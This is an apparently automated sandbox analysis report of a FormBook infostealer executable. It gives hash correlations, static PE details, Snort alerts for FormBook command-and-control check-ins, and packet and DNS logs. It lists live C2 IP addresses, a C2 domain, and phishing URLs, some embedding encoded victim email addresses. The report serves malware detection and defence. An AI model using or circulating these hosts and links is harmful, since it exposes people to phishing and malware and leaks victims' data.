                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          MT103-746394.docGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                          • 198.185.159.145
                                          shops.myshopify.comhttp://kuurza.comGet hashmaliciousUnknownBrowse
                                          • 23.227.38.74
                                          03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          Order-1351125X.docx.docGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUShttps://www.newschoolers.com/click?news=50302&u=http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f%26jobcode=739-0055%26omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055%26lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D%26cid=gcc_DM212754%26bid=268417862%26rid=1061475%26p1=%41%4E%54oniopneus.com.br/dayo/uevcx/captcha/bWF0cy5hcnRodXJzc29uQHF1aWx0ZXJjaGV2aW90LmNvbQ==$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                          • 188.114.96.3
                                          https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflkGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.2.184
                                          0NJYTCJYLo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 104.26.13.205
                                          https://nmg.evlink21.net/Get hashmaliciousUnknownBrowse
                                          • 104.21.80.92
                                          http://kuurza.comGet hashmaliciousUnknownBrowse
                                          • 172.67.41.60
                                          https://email.abad-ca.com/web/webmail4/#midlands.sales@aggregate.comGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          SecuriteInfo.com.Trojan.AutoIt.1410.29083.29061.exeGet hashmaliciousStealeriumBrowse
                                          • 104.16.185.241
                                          http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.comGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          Order 0003994887588960600000.bat.exeGet hashmaliciousGuLoaderBrowse
                                          • 172.67.74.152
                                          TRELLIAN-AS-APTrellianPtyLimitedAUSOA 020724.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                          • 103.224.182.252
                                          rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.246
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.210
                                          PO - 04755 .bat.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.242
                                          288292021 ABB.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          RITS Ref 3379-06.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.246
                                          NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                                          • 103.224.182.250
                                          SQUARESPACEUSOrden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att00173994.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          http://scarlet-marigold-h469.squarespace.com/Get hashmaliciousUnknownBrowse
                                          • 198.185.159.177
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                          • 198.185.159.145
                                          UHGL-AS-APUCloudHKHoldingsGroupLimitedHKSecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                          • 128.1.131.130
                                          ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          http://paxfuling.com/Get hashmaliciousUnknownBrowse
                                          • 152.32.238.127
                                          BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          Cotizacin EXP 3382.007-3 - II.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.189.143

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tYEY1UeurGz0Mjb.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.946897248814463
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:tYEY1UeurGz0Mjb.exe
                                          File size:621'056 bytes
                                          MD5:a9c37f81cd9a181dab2262d2f8456a76
                                          SHA1:549e7a8c8e998d3b7f85e61a7171685af231e780
                                          SHA256:76650fb8aeaf679cd204ca347026a67767ab8d9c27f65597b275d8d57327e096
                                          SHA512:9f6c03d6c08eab4c6cf9504fa5402436bc783a9cf95ab9419f1f18f26e605bd66c44fb3a4ab7489bf6a1fcebdc9cb2a65e8a77e5f81744704ebe29c6dfe05002
                                          SSDEEP:12288:i15ofC1PsZKuN8TsFLtm9FTXJWhnVwVEhkG2jbZVv1XDSXGMvu:i1n1sfSTshg9FwnV3mj9Xd
                                          TLSH:3BD412D532ACAF0BE43AEBFA8568945583B6BD5768B0F7C41CC130DA647AF048951F23
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..p............... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x498f9e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xD5C8FEB5 [Sat Aug 28 22:56:53 2083 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x98f490x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x5d4.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x973740x70.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x96fa40x970003cdd806b0ae9c78782b165c15e43a8c4False0.9589083842094371data7.953654666683159IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x9a0000x5d40x6003e96ae90b899bf851835f5c685b08d2fFalse0.4375data4.1488069805692565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x9c0000xc0x200af2303c538e6cb9812d67b30e775ec96False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x9a0900x344data0.44138755980861244
                                          RT_MANIFEST0x9a3e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          07/04/24-16:34:26.175750TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.5216.83.55.173
                                          07/04/24-16:37:49.666946TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.5188.114.97.3
                                          07/04/24-16:36:27.968302TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.53.64.163.50
                                          07/04/24-16:34:46.796764TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5154.204.100.23
                                          07/04/24-16:35:46.877456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.5198.185.159.144
                                          07/04/24-16:35:26.166423TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.5185.151.30.212
                                          07/04/24-16:36:49.977451TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.5128.1.131.130
                                          07/04/24-16:37:09.149461TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.5103.8.70.95
                                          07/04/24-16:36:07.818487TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.5103.224.212.213
                                          07/04/24-16:38:31.660414TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.523.227.38.74
                                          07/04/24-16:38:10.816088TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.591.195.240.123

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 4, 2024 16:34:26.170739889 CEST4971680192.168.2.5216.83.55.173
                                          Jul 4, 2024 16:34:26.175617933 CEST8049716216.83.55.173192.168.2.5
                                          Jul 4, 2024 16:34:26.175694942 CEST4971680192.168.2.5216.83.55.173
                                          Jul 4, 2024 16:34:26.175750017 CEST4971680192.168.2.5216.83.55.173
                                          Jul 4, 2024 16:34:26.180656910 CEST8049716216.83.55.173192.168.2.5
                                          Jul 4, 2024 16:34:26.667316914 CEST4971680192.168.2.5216.83.55.173
                                          Jul 4, 2024 16:34:26.714591026 CEST8049716216.83.55.173192.168.2.5
                                          Jul 4, 2024 16:34:26.784888983 CEST8049716216.83.55.173192.168.2.5
                                          Jul 4, 2024 16:34:26.784964085 CEST4971680192.168.2.5216.83.55.173
                                          Jul 4, 2024 16:34:46.791856050 CEST4971780192.168.2.5154.204.100.23
                                          Jul 4, 2024 16:34:46.796638966 CEST8049717154.204.100.23192.168.2.5
                                          Jul 4, 2024 16:34:46.796710968 CEST4971780192.168.2.5154.204.100.23
                                          Jul 4, 2024 16:34:46.796763897 CEST4971780192.168.2.5154.204.100.23
                                          Jul 4, 2024 16:34:46.801872969 CEST8049717154.204.100.23192.168.2.5
                                          Jul 4, 2024 16:34:47.307773113 CEST4971780192.168.2.5154.204.100.23
                                          Jul 4, 2024 16:34:47.313107967 CEST8049717154.204.100.23192.168.2.5
                                          Jul 4, 2024 16:34:47.313164949 CEST4971780192.168.2.5154.204.100.23
                                          Jul 4, 2024 16:35:26.158893108 CEST4971980192.168.2.5185.151.30.212
                                          Jul 4, 2024 16:35:26.163681984 CEST8049719185.151.30.212192.168.2.5
                                          Jul 4, 2024 16:35:26.166423082 CEST4971980192.168.2.5185.151.30.212
                                          Jul 4, 2024 16:35:26.166423082 CEST4971980192.168.2.5185.151.30.212
                                          Jul 4, 2024 16:35:26.171588898 CEST8049719185.151.30.212192.168.2.5
                                          Jul 4, 2024 16:35:26.661442995 CEST4971980192.168.2.5185.151.30.212
                                          Jul 4, 2024 16:35:26.666713953 CEST8049719185.151.30.212192.168.2.5
                                          Jul 4, 2024 16:35:26.666783094 CEST4971980192.168.2.5185.151.30.212
                                          Jul 4, 2024 16:35:46.872422934 CEST4972080192.168.2.5198.185.159.144
                                          Jul 4, 2024 16:35:46.877300024 CEST8049720198.185.159.144192.168.2.5
                                          Jul 4, 2024 16:35:46.877356052 CEST4972080192.168.2.5198.185.159.144
                                          Jul 4, 2024 16:35:46.877455950 CEST4972080192.168.2.5198.185.159.144
                                          Jul 4, 2024 16:35:46.882983923 CEST8049720198.185.159.144192.168.2.5
                                          Jul 4, 2024 16:35:47.370378971 CEST4972080192.168.2.5198.185.159.144
                                          Jul 4, 2024 16:35:47.375786066 CEST8049720198.185.159.144192.168.2.5
                                          Jul 4, 2024 16:35:47.378444910 CEST4972080192.168.2.5198.185.159.144
                                          Jul 4, 2024 16:36:07.806391001 CEST4972180192.168.2.5103.224.212.213
                                          Jul 4, 2024 16:36:07.812731028 CEST8049721103.224.212.213192.168.2.5
                                          Jul 4, 2024 16:36:07.818486929 CEST4972180192.168.2.5103.224.212.213
                                          Jul 4, 2024 16:36:07.818486929 CEST4972180192.168.2.5103.224.212.213
                                          Jul 4, 2024 16:36:07.823282003 CEST8049721103.224.212.213192.168.2.5
                                          Jul 4, 2024 16:36:08.310376883 CEST4972180192.168.2.5103.224.212.213
                                          Jul 4, 2024 16:36:08.315751076 CEST8049721103.224.212.213192.168.2.5
                                          Jul 4, 2024 16:36:08.315855980 CEST4972180192.168.2.5103.224.212.213
                                          Jul 4, 2024 16:36:27.962404013 CEST4972280192.168.2.53.64.163.50
                                          Jul 4, 2024 16:36:27.968166113 CEST80497223.64.163.50192.168.2.5
                                          Jul 4, 2024 16:36:27.968301058 CEST4972280192.168.2.53.64.163.50
                                          Jul 4, 2024 16:36:27.968302011 CEST4972280192.168.2.53.64.163.50
                                          Jul 4, 2024 16:36:27.973223925 CEST80497223.64.163.50192.168.2.5
                                          Jul 4, 2024 16:36:28.464190006 CEST4972280192.168.2.53.64.163.50
                                          Jul 4, 2024 16:36:28.469980001 CEST80497223.64.163.50192.168.2.5
                                          Jul 4, 2024 16:36:28.470040083 CEST4972280192.168.2.53.64.163.50
                                          Jul 4, 2024 16:36:49.972515106 CEST4972380192.168.2.5128.1.131.130
                                          Jul 4, 2024 16:36:49.977322102 CEST8049723128.1.131.130192.168.2.5
                                          Jul 4, 2024 16:36:49.977395058 CEST4972380192.168.2.5128.1.131.130
                                          Jul 4, 2024 16:36:49.977451086 CEST4972380192.168.2.5128.1.131.130
                                          Jul 4, 2024 16:36:49.982259989 CEST8049723128.1.131.130192.168.2.5
                                          Jul 4, 2024 16:36:50.479562044 CEST4972380192.168.2.5128.1.131.130
                                          Jul 4, 2024 16:36:50.526539087 CEST8049723128.1.131.130192.168.2.5
                                          Jul 4, 2024 16:36:50.590434074 CEST8049723128.1.131.130192.168.2.5
                                          Jul 4, 2024 16:36:50.590495110 CEST4972380192.168.2.5128.1.131.130
                                          Jul 4, 2024 16:37:09.144470930 CEST4972480192.168.2.5103.8.70.95
                                          Jul 4, 2024 16:37:09.149357080 CEST8049724103.8.70.95192.168.2.5
                                          Jul 4, 2024 16:37:09.149434090 CEST4972480192.168.2.5103.8.70.95
                                          Jul 4, 2024 16:37:09.149461031 CEST4972480192.168.2.5103.8.70.95
                                          Jul 4, 2024 16:37:09.154289961 CEST8049724103.8.70.95192.168.2.5
                                          Jul 4, 2024 16:37:09.637475014 CEST4972480192.168.2.5103.8.70.95
                                          Jul 4, 2024 16:37:09.684581995 CEST8049724103.8.70.95192.168.2.5
                                          Jul 4, 2024 16:37:30.530857086 CEST8049724103.8.70.95192.168.2.5
                                          Jul 4, 2024 16:37:30.530910969 CEST4972480192.168.2.5103.8.70.95
                                          Jul 4, 2024 16:37:49.661727905 CEST4972580192.168.2.5188.114.97.3
                                          Jul 4, 2024 16:37:49.666596889 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:49.666822910 CEST4972580192.168.2.5188.114.97.3
                                          Jul 4, 2024 16:37:49.666945934 CEST4972580192.168.2.5188.114.97.3
                                          Jul 4, 2024 16:37:49.671823978 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.162930012 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.162942886 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.162957907 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.162967920 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.162980080 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.163072109 CEST4972580192.168.2.5188.114.97.3
                                          Jul 4, 2024 16:37:50.163120985 CEST4972580192.168.2.5188.114.97.3
                                          Jul 4, 2024 16:37:50.163120985 CEST4972580192.168.2.5188.114.97.3
                                          Jul 4, 2024 16:37:50.163825989 CEST8049725188.114.97.3192.168.2.5
                                          Jul 4, 2024 16:37:50.163949013 CEST4972580192.168.2.5188.114.97.3

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 4, 2024 16:34:25.512185097 CEST5740853192.168.2.51.1.1.1
                                          Jul 4, 2024 16:34:26.169848919 CEST53574081.1.1.1192.168.2.5
                                          Jul 4, 2024 16:34:46.417721987 CEST5313653192.168.2.51.1.1.1
                                          Jul 4, 2024 16:34:46.791239023 CEST53531361.1.1.1192.168.2.5
                                          Jul 4, 2024 16:35:26.138349056 CEST5006253192.168.2.51.1.1.1
                                          Jul 4, 2024 16:35:26.154699087 CEST53500621.1.1.1192.168.2.5
                                          Jul 4, 2024 16:35:46.824351072 CEST4931353192.168.2.51.1.1.1
                                          Jul 4, 2024 16:35:46.871419907 CEST53493131.1.1.1192.168.2.5
                                          Jul 4, 2024 16:36:07.319444895 CEST6367053192.168.2.51.1.1.1
                                          Jul 4, 2024 16:36:07.800064087 CEST53636701.1.1.1192.168.2.5
                                          Jul 4, 2024 16:36:27.933382034 CEST5614153192.168.2.51.1.1.1
                                          Jul 4, 2024 16:36:27.958539963 CEST53561411.1.1.1192.168.2.5
                                          Jul 4, 2024 16:36:48.364486933 CEST5754053192.168.2.51.1.1.1
                                          Jul 4, 2024 16:36:49.370213032 CEST5754053192.168.2.51.1.1.1
                                          Jul 4, 2024 16:36:49.969120979 CEST53575401.1.1.1192.168.2.5
                                          Jul 4, 2024 16:36:49.969204903 CEST53575401.1.1.1192.168.2.5
                                          Jul 4, 2024 16:37:08.745883942 CEST5290953192.168.2.51.1.1.1
                                          Jul 4, 2024 16:37:09.143701077 CEST53529091.1.1.1192.168.2.5
                                          Jul 4, 2024 16:37:29.183526039 CEST6170553192.168.2.51.1.1.1
                                          Jul 4, 2024 16:37:29.602471113 CEST53617051.1.1.1192.168.2.5
                                          Jul 4, 2024 16:37:49.623927116 CEST5630953192.168.2.51.1.1.1
                                          Jul 4, 2024 16:37:49.660924911 CEST53563091.1.1.1192.168.2.5
                                          Jul 4, 2024 16:38:10.776838064 CEST5321953192.168.2.51.1.1.1
                                          Jul 4, 2024 16:38:10.807018042 CEST53532191.1.1.1192.168.2.5
                                          Jul 4, 2024 16:38:31.464307070 CEST5799953192.168.2.51.1.1.1
                                          Jul 4, 2024 16:38:31.654923916 CEST53579991.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jul 4, 2024 16:34:25.512185097 CEST192.168.2.51.1.1.10xf0bcStandard query (0)www.yr8gl32.vipA (IP address)IN (0x0001)false
